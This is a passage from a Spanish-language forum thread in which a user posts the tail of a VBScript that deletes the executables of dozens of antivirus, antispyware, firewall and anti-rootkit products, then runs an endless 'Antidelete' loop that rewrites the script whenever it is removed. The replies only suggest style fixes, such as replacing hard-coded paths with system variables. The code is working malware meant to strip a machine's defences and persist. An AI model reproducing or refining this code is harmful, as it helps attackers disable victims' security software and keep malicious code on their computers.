  243. Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2005\PavKRE.exe"
  244. Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2005\PavProt.exe"
  245. Kill "C:\Archivos de programa\Archivos comunes\Panda Software\PavShld\pavprsrv.exe"
  246. Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2005\pavsrv51.exe"
  247. Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2005\prevsrv.exe"
  248. Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2005\AVENGINE.EXE"
  249. Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2005\PsImSvc.exe"
  250. Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2005\WebProxy.exe"
  251. Kill "C:\Archivos de programa\Panda Software\Panda Titanium 2006 Antivirus + Antispyware\PavFnSvr.exe"
  252. Kill "C:\Archivos de programa\Archivos comunes\Panda Software\PavShld\pavprsrv.exe"
  253. Kill "C:\Archivos de programa\Panda Software\Panda Titanium 2006 Antivirus + Antispyware\pavsrv51.exe"
  254. Kill "C:\Archivos de programa\Panda Software\Panda Titanium 2006 Antivirus + Antispyware\FIREWALL\PNMSRV.EXE"
  255. Kill "C:\Archivos de programa\Panda Software\Panda Titanium 2006 Antivirus + Antispyware\AVENGINE.EXE"
  256. Kill "C:\Archivos de programa\Panda Software\Panda Titanium 2006 Antivirus + Antispyware\PsImSvc.exe"
  257. Kill "C:\Archivos de programa\Panda Software\Panda Titanium 2006 Antivirus + Antispyware\apvxdwin.exe"
  258. Kill "C:\Archivos de programa\Panda Software\Panda Titanium 2006 Antivirus + Antispyware\WebProxy.exe"
  259. Kill "C:\Archivos de programa\Archivos comunes\Panda Software\PavShld\pavprsrv.exe"
  260. Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2004\Pavsrv51.exe"
  261. Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2004\APVXDWIN.EXE"
  262. Kill "C:\Archivos de programa\Spybot - Search & Destroy\SpybotSD.exe"
  263. Kill "C:\Archivos de programa\Spybot - Search & Destroy\TeaTimer.exe"
  264. Kill "C:\Archivos de programa\Spybot - Search & Destroy\SpybotSD.exe"
  265. Kill "C:\Archivos de programa\Spybot - Search & Destroy\Advcheck.dll"
  266. Kill "C:\Archivos de programa\AntiVir\avcenter.exe"
  267. Kill "C:\Archivos de programa\AntiVir\avscan.exe"
  268. Kill "C:\Archivos de programa\AntiVir\avnotify.exe"
  269. Kill "C:\Archivos de programa\AntiVir\guardgui.exe"
  270. Kill "C:\Archivos de programa\AntiVir\avgnt.exe"
  271. Kill "C:\Archivos de programa\AntiVir\avguard.exe"
  272. Kill "C:\Archivos de programa\AntiVir\avcmd.exe"
  273. Kill "C:\Archivos de programa\Softwin\BitDefender8\bdmcon.exe"
  274. Kill "C:\Archivos de programa\Softwin\BitDefender8\bdlite.exe"
  275. Kill "C:\Archivos de programa\Softwin\BitDefender8\bdmcon.exe"
  276. Kill "C:\Archivos de programa\Softwin\BitDefender8\bdnagent.exe"
  277. Kill "C:\Archivos de programa\Softwin\BitDefender8\rtvr.exe"
  278. Kill "C:\Archivos de programa\Alwil Software\Avast4\ashAvast.exe"
  279. Kill "C:\Archivos de programa\Alwil Software\Avast4\ashBug.exe"
  280. Kill "C:\Archivos de programa\Alwil Software\Avast4\ashDisp.exe"
  281. Kill "C:\Archivos de programa\Alwil Software\Avast4\ashQuick.exe"
  282. Kill "C:\Archivos de programa\Norton AntiVirus\NavShExt.dll"
  283. Kill "C:\Archivos de programa\Norton AntiVirus\navapw32.exe"
  284. Kill "C:\Archivos de programa\Norton AntiVirus\navapsvc.exe"
  285. Kill "C:\Archivos de programa\Kaspersky Lab\Kaspersky Anti-Virus 6.0\avp.exe"
  286. Kill "C:\Archivos de programa\McAfee\Common Framework\UdaterUI.exe"
  287. Kill "C:\Archivos de programa\McAfee\Common Framework\McTray.exe"
  288. Kill "C:\Archivos de programa\McAfee\Common Framework\FrameworkService.exe"
  289. Kill "C:\Archivos de programa\McAfee\VirusScan Enterprise\Mcshield.exe"
  290. Kill "C:\Archivos de programa\McAfee\VirusScan Enterprise\VsTskMgr.exe"
  291. Kill "C:\Archivos de programa\Grisoft\AVG7\avgcc.exe"
  292. Kill "C:\Archivos de programa\Grisoft\AVG7\avgemc.exe"
  293. Kill "C:\Archivos de programa\Grisoft\AVG7\avginet.exe"
  294. Kill "C:\Archivos de programa\Grisoft\AVG7\avgw.exe"
  295. Kill "C:\Archivos de programa\Grisoft\AVG7\avgv.exe"
  296. Kill "C:\Archivos de programa\Lavasoft\Ad-Aware SE Professional\Ad-Watch.exe"
  297. Kill "C:\Archivos de programa\Lavasoft\Ad-Aware SE Professional\Ad-Aware.exe"
  298. Kill "C:\Archivos de programa\Lavasoft\Ad-Aware SE Professional\alert.wav"
  299. Kill "C:\Archivos de programa\Lavasoft\Ad-Aware SE Professional\Plugins\filespecs.dll"
  300. Kill "C:\Archivos de programa\Lavasoft\Ad-Aware SE Professional\Plugins\lspexplorer.dll"
  301. Kill "C:\Archivos de programa\Lavasoft\Ad-Aware SE Professional\Plugins\Vx2Cleaner.dll"
  302. Kill "C:\Archivos de programa\SpyBro\SpyBro.exe"
  303. Kill "C:\Archivos de programa\SpyBro\nospylauncher.exe"
  304. Kill "C:\Archivos de programa\Spyware Doctor\drvclt.exe"
  305. Kill "C:\Archivos de programa\Spyware Doctor\swdoctor.exe"
  306. Kill "C:\Archivos de programa\Spyware Doctor\swdsvc.exe"
  307. Kill "C:\Archivos de programa\Spyware Doctor\swcntaux.exe"
  308. Kill "C:\Archivos de programa\Spyware Doctor\sdinvoker.exe"
  309. Kill "C:\Archivos de programa\Spyware Doctor\drvctl.exe"
  310. Kill "C:\Archivos de programa\Spyware Doctor\refdb.bin"
  311. Kill "C:\Archivos de programa\xp-AntiSpy\xp-AntiSpy.exe"
  312. Kill "C:\Archivos de programa\Ashampoo\Ashampoo FireWall\FireWall.exe"
  313. Kill "C:\Archivos de programa\Comodo\Firewall\cpf.exe"
  314. Kill "C:\Archivos de programa\Comodo\Firewall\cmdagent.exe"
  315. Kill "C:\Archivos de programa\Comodo\Firewall\cpfsubmit.exe"
  316. Kill "C:\Archivos de programa\Comodo\Firewall\crashrep.exe"
  317. Kill "C:\Archivos de programa\RootKit Hook Analyzer\hookAnalyzer.exe"
  318. Kill "C:\Archivos de programa\Anti-keylogger\Anti-keylogger.exe"
  319. Kill "C:\Archivos de programa\ATS2\ats.exe"
  320. Kill "C:\Archivos de programa\ATS2\d1.exe"
  321. Kill "C:\Archivos de programa\ATS2\sysinfo.exe"
  322. Kill "C:\Archivos de programa\Network Associates\VirusScan\Mcshield.exe"
  323. Kill "C:\Archivos de programa\Network Associates\VirusScan\VsTskMgr.exe"
  324. Kill "C:\Archivos de programa\Network Associates\VirusScan\SHSTAT.EXE"
  325. End Sub
  326.  
  327.  
  328. Function Antidelete()
  329. On Error Resume Next
  330. Set fso = CreateObject("scripting.filesystemobject")
  331. Set Myself = fso.opentextfile(wscript.scriptfullname, 1)
  332. MyCode = Myself.readall
  333. Myself.Close
  334. Do
  335. If Not (fso.fileexists(wscript.scriptfullname)) Then
  336. Set Myself = fso.createtextfile(wscript.scriptfullname, True)
  337. Myself.write MyCode
  338. Myself.Close
  339. End If
  340. Loop
  341. End Function

Basado en código de Hendrix y Octalh


En línea

Nuestro idioma ha tardado 12 siglos en llegar hasta hoy día. Tú tan sólo tardas 20 segundos en escribir un post: no destroces en tan poco tiempo lo que tantos siglos ha costado crear.
Hans el Topo


Desconectado Desconectado

Mensajes: 1.752


"Estoy cansado de no hacer nada"


Ver Perfil WWW
Re: Comprobación de integridad de un código de VB
« Respuesta #1 en: 2 Enero 2008, 21:13 »

de primeras y a simple vista diría que eso de poner rutas absolutas mal

utiliza variables de sistema para encontrar las ubicaciones o busca la ruta de los programas en el registro


En línea

 
corax

Desconectado Desconectado

Mensajes: 220


Primum non nocere


Ver Perfil
Re: Comprobación de integridad de un código de VB
« Respuesta #2 en: 2 Enero 2008, 21:23 »

ammm... ok, hans. Gracias por el consejo, buscaré cómo hacerlo. Como ya he dicho, estoy dando mis primeros pasos en el mundo de la programación, y la verdad es que no puedo dedicarle todo el tiempo que quisiera a leer manuales de VB. Se agradecen todas las sugerencias. ;)
En línea

Nuestro idioma ha tardado 12 siglos en llegar hasta hoy día. Tú tan sólo tardas 20 segundos en escribir un post: no destroces en tan poco tiempo lo que tantos siglos ha costado crear.
byebye


Desconectado Desconectado

Mensajes: 5.093



Ver Perfil
Re: Comprobación de integridad de un código de VB
« Respuesta #3 en: 3 Enero 2008, 13:18 »

y para migusto tanta repeticion de codigo solo hce que marear a la hora de leer. mete los strings necesarios en un fichero, depues lees cadena por cadena lo que necesites y en un solo bucle te quitas un monton de lineas y a la hora de leer esta mas ordenado.
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Comprobacion registro
Programación C/C++
MasterPunk 4 1,588 Último mensaje 2 Junio 2011, 21:33
por MasterPunk
Imposible Descifrar axx por error En la comprobación de integridad HMAC
Criptografía
Knlos 1 3,309 Último mensaje 2 Agosto 2011, 18:22
por APOKLIPTICO
integridad de ficheros en Windows 7
Seguridad
pepitogrillo2003 2 951 Último mensaje 25 Septiembre 2014, 17:23
por pepitogrillo2003
[PYTHON] Verificar integridad de un mensaje
Scripting
Josholsan 4 3,314 Último mensaje 24 Octubre 2014, 01:47
por Josholsan
Integridad de un documento
Seguridad
guiu 3 1,302 Último mensaje 10 Febrero 2015, 15:46
por T. Collins
Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines